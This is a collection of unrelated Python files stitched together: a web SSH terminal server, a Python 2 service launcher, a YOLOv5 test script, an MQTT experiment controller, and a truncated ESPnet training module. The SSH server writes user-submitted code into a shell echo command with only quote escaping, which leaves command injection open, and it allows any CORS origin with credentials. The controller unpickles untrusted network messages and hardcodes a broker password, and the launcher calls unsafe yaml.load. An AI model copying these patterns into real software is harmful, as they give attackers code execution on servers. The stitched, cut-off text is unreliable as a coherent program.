aioserver.py
from aiohttp import web
import aiohttp
import paramiko
import threading
import aiohttp_cors
import asyncio
async def rev_send(socket):
while not socket.ws.closed:
await asyncio.sleep(0.1)
try:
data = socket.shell.recv(8192)
await socket.ws.send_bytes(data)
except Exception as e:
print(type(e), str(e))
def start_loop(loop):
loop.run_forever()
def sftp_exec_command(ssh_client, command):
try:
std_in, std_out, std_err = ssh_client.exec_command(command, timeout=4)
out = "".join([line for line in std_out])
return out
except Exception as e:
print(e)
return None
async def coding(request):
data = await request.json()
code_id = data["code_id"]
code = data["code"]
host = data["host"]
port = int(data['port'])
user = data['username']
password = data['password']
# the submitted code is not pre-escaped; escape double quotes before embedding it in the echo command below
code = code.replace('"', '\\"')
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(host, port, user, password)
sftp_exec_command(ssh_client, f"mkdir -p ~/{code_id}")
sftp_exec_command(ssh_client, f"echo \"{code}\" > ~/{code_id}/main.py")
ssh_client.close()
return web.json_response(
{"data": {"ssh_command": f"python ~/{code_id}/main.py"}, "error_code": 0, "msg": "ok"})
class WebSocketHandler(web.View, aiohttp_cors.CorsViewMixin):
async def get(self):
self.ws = web.WebSocketResponse()
await self.ws.prepare(self.request)
data = self.request.query
host = data["host"]
port = int(data['port'])
user = data['username']
password = data['password']
self.sshclient = paramiko.SSHClient()
self.sshclient.load_system_host_keys()
self.sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.sshclient.connect(host, port, user, password)
self.shell = self.sshclient.invoke_shell(term='xterm')
self.shell.settimeout(90)
self.status = True
new_loop = asyncio.new_event_loop()
t = threading.Thread(target=start_loop, args=(new_loop,))
t.start()
asyncio.run_coroutine_threadsafe(rev_send(self), new_loop)
async for msg in self.ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close':
await self.ws.close()
else:
self.shell.send(msg.data)
elif msg.type == aiohttp.WSMsgType.ERROR:
print('ws connection closed with exception %s' %
self.ws.exception())
elif msg.type == aiohttp.WSMsgType.CLOSE:
break
print('websocket connection closed')
new_loop.call_soon_threadsafe(new_loop.stop)  # loop.stop() is not thread-safe when called from another thread
print(t.is_alive())
return self.ws
app = web.Application()
app.router.add_routes([web.view('/terminals/', WebSocketHandler), web.post('/coding', coding), ])
cors = aiohttp_cors.setup(
app,
defaults={
"*": aiohttp_cors.ResourceOptions(
allow_credentials=True,
expose_headers="*",
allow_headers="*",
)
})
for route in list(app.router.routes()):
cors.add(route)
web.run_app(app, host="127.0.0.1", port=3000)
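# --- Example client (an illustrative sketch, not part of aioserver.py) ---
# Shows how the two endpoints above could be exercised: POST /coding to upload a snippet,
# then the /terminals/ websocket to drive the interactive shell. The SSH host, port and
# credentials below are placeholders, and the server is assumed to be running on
# 127.0.0.1:3000 as configured above.
import asyncio
import aiohttp

async def demo():
    creds = {"host": "192.0.2.10", "port": "22", "username": "user", "password": "secret"}
    async with aiohttp.ClientSession() as session:
        # 1) upload a snippet through POST /coding
        payload = dict(creds, code_id="demo1", code='print("hello")')
        async with session.post("http://127.0.0.1:3000/coding", json=payload) as resp:
            print(await resp.json())  # {"data": {"ssh_command": "python ~/demo1/main.py"}, ...}
        # 2) drive the interactive shell through the websocket endpoint
        async with session.ws_connect("http://127.0.0.1:3000/terminals/", params=creds) as ws:
            await ws.send_str("python ~/demo1/main.py\n")
            msg = await ws.receive()                 # shell output arrives as binary frames
            if msg.type == aiohttp.WSMsgType.BINARY:
                print(msg.data.decode(errors="replace"))
            await ws.send_str("close")               # the server closes the socket on 'close'

asyncio.run(demo())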
run.py
#!/usr/bin/python
# Standard Library
import os
import sys
import time
import subprocess
from threading import Thread
from Queue import Queue
# Third Party
import yaml
# Local
waitTime = 10
services = [
{
"name": "frontend",
"command": ["./main.py", "-e", "-d"],
"color": "1"
},
{
"name": "markcuban",
"command": ["./main.py", "-e", "-d"],
"color": "2"
},
{
"name": "jaunt",
"command": ["./main.py", "-e", "-d"],
"color": "3"
},
{
"name": "redshirt",
"command": ["./main.py", "-e", "-d"],
"color": "6"
},
{
"name": "flint",
"command": ["./main.py", "-e", "-d"],
"color": "5"
},
{
"name": "lego",
"command": ["./main.py", "-e", "-d"],
"color": "20"
},
{
"name": "wf-run",
"path": ["lego"],
"command": ["celery","-A","lib.runner","worker"],
"color": 22
}
]
def getTerminalSize():
env = os.environ
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
'1234'))
except:
return
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
### Use get(key[, default]) instead of a try/catch
#try:
# cr = (env['LINES'], env['COLUMNS'])
#except:
# cr = (25, 80)
return int(cr[1]), int(cr[0])
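# Note (a sketch, not a change to this script): on Python 3 the same information is
# available from the standard library via shutil.get_terminal_size((80, 25)); the manual
# ioctl/environment fallback above is kept because this file targets Python 2
# (print statements, the Queue import).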
if __name__ == "__main__":
conf = yaml.load(open("conf.yml"))
os.environ["ZKHOSTS"] = "|".join(conf["zkhosts"])
import mixingboard
for key, value in conf.items():
mixingboard.setConf(key, value)
currentDirectory = os.path.dirname(os.path.realpath(__file__))
logDirectory = os.path.join(currentDirectory, "logs")
os.environ["PYTHONPATH"] += ":%s:" % currentDirectory
try:
os.mkdir(logDirectory)
except OSError:
pass
def runService(service):
logFileName = os.path.join(logDirectory, "%s.log" % service['name'])
with open(logFileName,"a") as logFile:
baseDirectory = currentDirectory
serviceDirectory = ""
if "path" in service:
serviceDirectory = os.path.join(*([baseDirectory] + service['path']))
else:
serviceDirectory = os.path.join(baseDirectory, service['name'])
while True:
proc = subprocess.Popen(service['command'], cwd=serviceDirectory, bufsize=0,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
print "\033[48;5;%smStarted %s...\033[0m" % (service['color'], service['name'])
while True:
nextline = proc.stdout.readline()
if nextline == '' and proc.poll() != None:
break
(width, _) = getTerminalSize()
line = "\033[48;5;%sm%s:\033[0m " % (service['color'], service['name'])
extra = 13
while True:
nextLinePos = width - (len(line) - extra)
line += nextline[:nextLinePos]
sys.stdout.write(line)
nextline = nextline[nextLinePos:]
if len(nextline) > 0:
extra = 14
line = "\n\033[48;5;%sm%s \033[0m " % (service['color'], ' '*len(service['name']))
else:
sys.stdout.write('\n')
break
sys.stdout.flush()
logFile.write(nextline)
logFile.flush()
print "\033[48;5;%smProcess %s exited. Waiting %s seconds and restarting\033[0m" % (
service['color'],
service['name'],
waitTime
)
time.sleep(waitTime)
for service in services:
t = Thread(target=runService, args=(service,))
t.daemon = True
t.start()
time.sleep(0.5)
while True:
try:
time.sleep(10)
except:
sys.exit(0)
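# --- conf.yml sketch (illustrative, not part of run.py) ---
# The script above only shows one required key, "zkhosts", a list joined into the
# ZKHOSTS environment variable; every other key is forwarded to mixingboard.setConf().
# The non-zkhosts keys below are placeholders, not settings the services are known to read.
import yaml

conf = {
    "zkhosts": ["zk1.example.com:2181", "zk2.example.com:2181"],
    # hypothetical extra settings, passed verbatim to mixingboard.setConf(key, value)
    "environment": "development",
    "region": "local",
}

with open("conf.yml", "w") as f:
    yaml.safe_dump(conf, f, default_flow_style=False)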
test.py
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
@torch.no_grad()
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
wandb_logger=None,
compute_loss=None,
half_precision=True,
is_coco=False,
opt=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' and half_precision # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
if isinstance(data, str):
is_coco = data.endswith('coco.yaml')
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = opt.task if opt.task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel Plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) if wandb_logger and wandb_logger.wandb_run else None
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # target indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # prediction indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements(exclude=('tensorboard', 'pycocotools', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
half_precision=opt.half,
opt=opt
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False, opt=opt)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False, opt=opt)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
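# --- Programmatic usage sketch (a separate script, not part of test.py) ---
# Exercises the standalone code path of test() above (model=None) without the CLI.
# The checkpoint and dataset paths are placeholders, and the Namespace carries only the
# attributes this path appears to read (device, project, name, exist_ok, task, plus
# single_cls, which create_dataloader consults).
import argparse
from test import test  # this module

opt = argparse.Namespace(device='', project='runs/test', name='exp', exist_ok=True,
                         task='val', single_cls=False)
results, maps, times = test('data/coco128.yaml',   # dataset yaml (placeholder)
                            weights='yolov5s.pt',  # checkpoint (placeholder)
                            batch_size=16, imgsz=640, opt=opt)
mp, mr, map50, map50_95 = results[:4]
print('mAP@0.5 = %.3f, mAP@0.5:0.95 = %.3f' % (map50, map50_95))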
control.py
import pickle
import paho.mqtt.client as mqtt
from threading import Thread
import time
import os
# algorithm imports
mec_nodes = {}
class BrokerCom:
def __init__(self, user, pw, ip, sub_topic):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.client = mqtt.Client()
self.stopped = set()
self.finished = set()
self.run = 1
def on_connect(self, connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(self.topic)
def on_message(self, message_client, userdata, msg): # ['start', {hostname: ip}, algo_no, cloud_ip, send_path ]
data = pickle.loads(msg.payload) # ['start', {hostname: ip, ...}, algo_no], ['stop': ip]
print(msg.topic, data)
if (data[0] == 'stop') and (data[1] not in self.stopped):
self.stopped.add(data[1])
print(f'{data[1]} has stopped!')
elif data[0] == 'about':
mec_nodes.update(data[1])
print(data[1])
elif data[0] == 'client finish':
self.finished.add(data[1])
print(f'client finish: {data[1]}')
def publish(self, topic, data):
self.client.publish(topic, data)
def broker_loop(self):
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.client.loop_start()
while True:
if self.run == 0:
self.client.loop_stop()
self.client.disconnect()
print('broker loop stopped!')
break
def __del__(self):
print('Broker Communication Object Deleted!')
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
"""
{'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117', 'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114', 'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111', 'osboxes-0': '192.168.122.110'}
"""
def exp_control():
global messenger
broker_dict = {'user': 'mec', 'pw': 'password', 'sub_topic': 'control/control', 'ip': '192.168.122.111'}
algos = [i for i in range(1,7)]
algo_nos = {1: 2, 2: 3, 3: 7, 4: 10, 5: 12, 6: 16}
exp_no = [4, 7, 10]
exp_type = ['homo', 'hetero']
cloud_ips = ['192.168.200.11', '192.168.200.12']
counter = 3
messenger = BrokerCom(**broker_dict)
h1 = Thread(target=messenger.broker_loop)
h1.start()
print('please start all other servers before you continue')
input('start: ')
print('hosts: ', mec_nodes)
s_hosts = sorted({i:mec_nodes[i] for i in mec_nodes if i != 'osboxes-0'})
for count in range(1, counter+1):
for kind in exp_type:
for algo_no in algos:
for mec_no in exp_no:
hosts = {i: mec_nodes[i] for i in s_hosts[:mec_no-1]}
hosts['osboxes-0'] = mec_nodes['osboxes-0']
h_list = list(hosts)
cloud_dict = {h_list[i]: cloud_ips[i%2] for i in range(len(h_list))}
send_path = f'/home/mec/result/{kind}/{count}'
data_mec = ['start', hosts, algo_no, cloud_dict, send_path]
# data = '' # # ['start', {hostname: ip}, algo_no, cloud_ip, send_path ]
print('initializing Edge nodes')
messenger.publish(topic='control/mec', data=pickle.dumps(data_mec))
data_client = ['start', hosts, algo_nos[algo_no], kind, send_path]
# ['start', {hostname: ip}, algo_id, homo/hetero, send_path]
time.sleep(20)
print('initializing Client Nodes')
messenger.publish(topic='control/client', data=pickle.dumps(data_client))
print(f'Experiment {mec_no} for {kind} has commenced!')
while len(messenger.finished) != 3:
time.sleep(60)
# messenger.publish('control/mec', pickle.dumps(['keep alive', 'mec']))
print('client is finished!')
messenger.finished = set()
time.sleep(3*60)
print('stopping edge nodes')
# messenger.publish(topic='control/mec', data=pickle.dumps(['stop', hosts]))
for host_ip in hosts.values():
messenger.publish(topic=mec_id(host_ip), data='stop')
while len(messenger.stopped) != mec_no:
time.sleep(10)
print('edge nodes are stopped!')
messenger.stopped = set()
print('stopping clients')
clients = ['124', '125', '126']
for client in clients:
messenger.publish(topic=client, data=str(['stop']))
print(f'Experiment {mec_no} for {kind} is concluded!')
print('Waiting for 60 seconds Time Lapse!')
time.sleep(60)
messenger.run = 0
print('All Experiments have been Concluded!')
if __name__ == '__main__':
os.system('clear')
try:
exp_control()
except KeyboardInterrupt:
print('killed')
messenger.run = 0
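# --- Node-side counterpart sketch (illustrative, not part of control.py) ---
# A minimal MEC-node agent inferred only from the message handling above: announce
# itself with ['about', {hostname: ip}] on 'control/control', listen on 'control/mec'
# for pickled 'start' commands and on its own mec_id topic for the plain 'stop' string,
# then acknowledge with ['stop', ip]. The node IP below is a placeholder; the broker
# address and credentials mirror broker_dict above.
import pickle
import socket
import paho.mqtt.client as mqtt

MY_IP = '192.168.122.119'              # placeholder node address
MY_ID = MY_IP.split('.')[-1].zfill(3)  # same zero padding as mec_id() above

def on_connect(client, userdata, flags, rc):
    client.subscribe([('control/mec', 0), (MY_ID, 0)])
    client.publish('control/control', pickle.dumps(['about', {socket.gethostname(): MY_IP}]))

def on_message(client, userdata, msg):
    if msg.topic == MY_ID and msg.payload.decode() == 'stop':
        client.publish('control/control', pickle.dumps(['stop', MY_IP]))
        client.disconnect()
    elif msg.topic == 'control/mec':
        data = pickle.loads(msg.payload)  # ['start', hosts, algo_no, cloud_dict, send_path]
        print('received command:', data[0])

node = mqtt.Client()
node.username_pw_set('mec', 'password')
node.on_connect = on_connect
node.on_message = on_message
node.connect('192.168.122.111', 1883, 60)
node.loop_forever()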
abs_task.py
from abc import ABC
from abc import abstractmethod
import argparse
from distutils.version import LooseVersion
import functools
import logging
import os
from pathlib import Path
import sys
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Union
import humanfriendly
import numpy as np
import torch
import torch.multiprocessing
import torch.nn
import torch.optim
from torch.utils.data import DataLoader
from typeguard import check_argument_types
from typeguard import check_return_type
import yaml
from espnet.utils.cli_utils import get_commandline_args
from espnet2.iterators.abs_iter_factory import AbsIterFactory
from espnet2.iterators.chunk_iter_factory import ChunkIterFactory
from espnet2.iterators.multiple_iter_factory import MultipleIterFactory
from espnet2.iterators.sequence_iter_factory import SequenceIterFactory
from espnet2.main_funcs.average_nbest_models import average_nbest_models
from espnet2.main_funcs.collect_stats import collect_stats
from espnet2.optimizers.sgd import SGD
from espnet2.samplers.build_batch_sampler import BATCH_TYPES
from espnet2.samplers.build_batch_sampler import build_batch_sampler
from espnet2.samplers.unsorted_batch_sampler import UnsortedBatchSampler
from espnet2.schedulers.abs_scheduler import AbsScheduler
from espnet2.schedulers.noam_lr import NoamLR
from espnet2.schedulers.warmup_lr import WarmupLR
from espnet2.torch_utils.load_pretrained_model import load_pretrained_model
from espnet2.torch_utils.model_summary import model_summary
from espnet2.torch_utils.pytorch_version import pytorch_cudnn_version
from espnet2.torch_utils.set_all_random_seed import set_all_random_seed
from espnet2.train.abs_espnet_model import AbsESPnetModel
from espnet2.train.class_choices import ClassChoices
from espnet2.train.dataset import DATA_TYPES
from espnet2.train.dataset import ESPnetDataset
from espnet2.train.distributed_utils import DistributedOption
from espnet2.train.distributed_utils import free_port
from espnet2.train.distributed_utils import get_master_port
from espnet2.train.distributed_utils import get_node_rank
from espnet2.train.distributed_utils import get_num_nodes
from espnet2.train.distributed_utils import resolve_distributed_mode
from espnet2.train.iterable_dataset import IterableESPnetDataset
from espnet2.train.reporter import Reporter
from espnet2.train.trainer import Trainer
from espnet2.utils.build_dataclass import build_dataclass
from espnet2.utils import config_argparse
from espnet2.utils.get_default_kwargs import get_default_kwargs
from espnet2.utils.nested_dict_action import NestedDictAction
from espnet2.utils.types import humanfriendly_parse_size_or_none
from espnet2.utils.types import int_or_none
from espnet2.utils.types import str2bool
from espnet2.utils.types import str2triple_str
from espnet2.utils.types import str_or_int
from espnet2.utils.types import str_or_none
from espnet2.utils.yaml_no_alias_safe_dump import yaml_no_alias_safe_dump
if LooseVersion(torch.__version__) >= LooseVersion("1.5.0"):
from torch.multiprocessing.spawn import ProcessContext
else:
from torch.multiprocessing.spawn import SpawnContext as ProcessContext
optim_classes = dict(
adam=torch.optim.Adam,
sgd=SGD,
adadelta=torch.optim.Adadelta,
adagrad=torch.optim.Adagrad,
adamax=torch.optim.Adamax,
asgd=torch.optim.ASGD,
lbfgs=torch.optim.LBFGS,
rmsprop=torch.optim.RMSprop,
rprop=torch.optim.Rprop,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.2.0"):
optim_classes["adamw"] = torch.optim.AdamW
try:
import torch_optimizer
optim_classes.update(
accagd=torch_optimizer.AccSGD,
adabound=torch_optimizer.AdaBound,
adamod=torch_optimizer.AdaMod,
diffgrad=torch_optimizer.DiffGrad,
lamb=torch_optimizer.Lamb,
novograd=torch_optimizer.NovoGrad,
pid=torch_optimizer.PID,
# torch_optimizer<=0.0.1a10 doesn't support
# qhadam=torch_optimizer.QHAdam,
